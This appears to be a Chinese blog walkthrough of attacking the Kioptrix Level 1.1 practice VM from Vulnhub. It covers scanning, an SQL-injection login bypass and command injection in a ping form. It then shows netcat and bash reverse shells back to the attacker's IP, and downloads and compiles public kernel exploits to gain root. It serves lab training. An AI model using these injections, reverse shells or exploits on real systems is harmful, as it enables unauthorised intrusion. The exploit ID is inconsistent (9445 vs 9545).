Vnlunhub靶机渗透-Kioptrix_Level_1.1

原创 于 2025-11-04 18:12:21 发布 · 1k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络 #网络安全 #靶机 #vnluhub

一.安装Kioptirx_Level_1.1(#2)

  1. 打开Vnlunhub网站搜索Kioptrix

  2. 选择Level1.1(#2)点击进入下载对应镜像并解压

  3. 下载成功后打开Vmware-文件-打开 找到镜像存放文件夹 打开镜像

  4. 开启靶机


    出现上述图像即为安装成功

二.        使用kali对靶机进行渗透攻击

  1. 首先确保两台机器处于同一网段下,##博主这里选择的是桥接模式并复制物理机状态,具体可参考我之前的kioptrix level 1 文章


     
  2. kali攻击机的ip地址


     

信息收集 #使用fscan和nmap扫描网段中的存活主机和对应端口
Fscan扫描:

fscan -h 192.168.140.0/24


扫描结果示例图:


Nmap扫描:

nmap -sn 192.168.140.0/24


扫描结果示例图:


综上图所示可以看出该网段有4个主机,通过图片可以判断出IP地址为192.168.140.88应该是我们所需要找的靶机
接着我们对这个ip地址进行进一步扫描
Fscan:      

​​​​​​​fscan -h 192.168.140.88


扫描结果示例图:

Nmap:    

​​​​​​​nmap -sV 192.168.140.88


扫描结果示例图:


综上可以看出该靶机开放了

22/tcp → SSH
80/tcp → Apache
111/tcp → rpcbind
443/tcp → HTTPS  等一系列端口

····         接着我们访问192.168.140.88这个网址,看看这个Web页面有没有暴露什么信息
 



   我们可以看到一个登录框

   我们继续进行网站信息收集看看是否有web端的敏感目录暴露出来 这里我使用dirsearch来扫描该网站的目录
 

dirsearch -u http://192.168.140.88 -e php,html,js,txt,bak


找到了许多敏感目录,但除了这个index.php外其他都是无法进入的,所以我们着重看一下这个登录界面有没有可以进行渗透的地方
我们看到3306数据库是开的 所以我们可以尝试一下sql注入
我们在Username里输入一个万能绕过测试:admin ‘ OR ’1’=1’—然后点击login


发现我们成功绕过登录
我们接着按照网站提示在网络中ping一台机器

发现能成功ping通,我们可以思考,如果这个网页有命令执行功能,没有上传功能,我们往往可以考虑一下这类功能会存在命令注入漏洞我们可以尝试使用 ; &&  等类似的分隔符进行注入


从上面的结果可以看出我们确实能执行系统命令,我们直接拿到shell

拿到shell后
1.转换成反弹shell 这里我们用的是Netcat:一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。
我们接着在命令分割符后输入
 

nc -e/bin/sh 192.168.140.254 4444


接着我们在kali中监听端口4444

nc -lvnp 4444


接着我们在kali上看到的是一个Connection refused的提示这说明了我们的靶机上可能没有nc 的 -e参数支持
我们可以使用其他的反弹shell
我们尝试一下Bash反弹
我们继续在分隔符后输入
 bash -i >& /dev/tcp/192.168.140.254/4444 0>&1


成功监听 接着我们输入id 看看我们现在的权限


发现我们现在不是root权限所以我们来到了最关键的一步

三.权限提升

1.我们输入uname -a看看这台机器的内核是什么


发现内核版本是2.6.9-55.EL,这是个经典的老版本,有已知的本地提权漏洞,所以我们可以去寻找一下有没有常用的exploit
在攻击机上查找可用exploit

searchsploit Linux 2.6.9


我们来着重看这两个CVE
CVE-2005-0736 (epoll_wait 整数溢出) → Exploit-DB ID: 1397
CVE-2009-2692 (sock_sendpage) → Exploit-DB ID: 9445
ID:1397
首先我们先把对应的exploit下载下来
 

searchsploit -m 1397


接着我们在exploit文件所在目录开一个http服务
 

python3 -m http.server 8080


在shell里用wget下载
 

wget http://192.168.140.254:8080/1397.c -O /tmp/1397.c


接着我们进行编译运行
 

gcc -o /tmp/1397 /tmp/1397.c


接着我们运行一下
 

/tmp/1397


发现这个内核版本已经对这个漏洞打过补丁,不能被利用

所以我们尝试一下新的路子即我们用
ID:9545 步骤如ID1397一样
 

searchsploit 9545
searchsploit -m 9545
wget http://192.168.140.254:8080/9545.c -O /tmp/9545.c
gcc -o /tmp/9545 /tmp/9545.c
/tmp/9545


发现9545漏洞成功提权使用


我们接着输入id 和whoami 来确认是否为root权限,经过上图可以看出我们已经提权成功
接着我们就可以输入
passwd 进行修改密码操作


我们转到靶机输入root 和更改后的密码


该靶机已渗透成功


 

jo_jun
关注
【Oscp备考-Kioptrix 1
weixin_44126257的博客
09-13 1811
Oscp备考
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 2130
Oscp备考:Kioptrix Level 2
Kioptrix level-4 多种姿势 渗透 详解
lukky_的博客
01-19 1452
记录一下 Kioptrix 1.3 的渗透测试 笔记。
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1418
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
Kioptrix VM3 靶机 - 详细流程
m0_73983897的博客
09-19 1616
流程:主机发现 - 端口扫描 - 信息收集 - web渗透 - 获取shell - 权限提升 信息收集:这次的靶机算是一个很标准的靶机了,信息收集的内容几乎全占了;其中通过指纹信息,搜索LotusCMS的漏洞发现可以通过命令执行获取Shell,算一个较大的战果;
渗透测试靶机---Kioptrix_Level_1
久恙502的博客
07-19 833
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Vulnhub靶机Kioptrix_Level1.1
qq_48904485的博客
03-13 625
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机Kioptrix_Level1.1192.168.56.104)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Vulnhub靶机渗透-Kioptrix_Level_1
XYZCG的博客
12-14 663
通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 363
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Vulnhub靶机Kioptrix_Level1.3
qq_48904485的博客
03-17 697
运行环境:Virtualbox攻击机:kali(192.168.56.101靶机Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
VulnHub靶机入门篇--kioptrix.level 3
2302_78903258的博客
07-29 1272
发现有一个login的登录框,可能存在sql注入漏洞,或者弱口令,并且发现这里有一个LotusCMS,网上查找一个信息,看看有没有相关的漏洞。这边可以看到URI为/lcms/但是我本地是没有这个路径的,所以我们这里需要设置下RHOSTS和URI。使用如下命令选择此 Auxiliary,或者使用命令。这里一直没有什么反应,可能是脚本的原因,用。哎,还是失败 ,查看原因,说使用Nat模式。使用msfconsole命令进入msf6。好像并没有什么用,只能看看80端口的服务。使用第14个的命令或者使用命令。
Kioptrix Level 1~4
cht6667的博客
02-17 1051
Kioptrix Level1~4打靶笔记
Kioptrix-1
猎荒者
03-16 1106
夫君子之行,静以修身,俭以养德,非淡泊无以明志,非宁静无以致远 00 环境准备 Kali(IP:10.10.16.128) Kioptrix 靶机 NAT 网络连接 01 主机发现 nmap -sP 10.10.16.0/24 02 端口扫描 nmap -A -v -sS -sP -p- -T4 10.10.16.152 得到开放的端口:22,80,111139,443,1024,并...
vulnhub靶机渗透 Kioptrix1.3
RestoreJustice的博客
03-18 346
​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。192.168.110.135,为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.110.1/24。使用nmap扫描端口,并做服务识别和深度扫描(加-A参数):nmap -p- -A 192.168.110.135。经测试登录处password参数存在SQL注入,并且爆出网站绝对路径:/var/www/
kioptrix_level_1 新手入门级通关攻略
qq_58683895的博客
09-16 1078
适用于零基础新人的通关攻略,其中包含涉及到知识点
Oscp备考-Kioptrix4
weixin_44126257的博客
02-28 415
Oscp备考-Kioptrix4
Kioptrix Level 1通关攻略
m0_73863497的博客
12-08 2424
执行了./470 | grep "1.3.20"命令,先是运行当前目录下的470文件(其功能未知),再通过grep工具筛选出包含 “1.3.20” 的输出行,展示的结果是不同操作系统环境下使用apache-1.3.20版本的相关配置情况,各系统以编号加对应描述形式呈现。注意这里的ip地址输入的是自己虚拟机的ip地址,目的是从虚拟机里上传到靶机中,使用 ip a 查看自己的虚拟机IP地址。对端口进行指纹探测,我们nmap探测的都是端口的默认服务(不一定它的端口就是使用的默认服务)
msf-nasm_shell使用方法
最新发布
10-07
考虑到用户引用了Windows XP靶机测试的内容,ta可能在调试旧系统上的漏洞利用。 需要强调几个实用技巧:首先要注意处理器模式切换,32位/64位输出的机器码完全不同;其次参数传递规则在不同平台有差异;另外用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值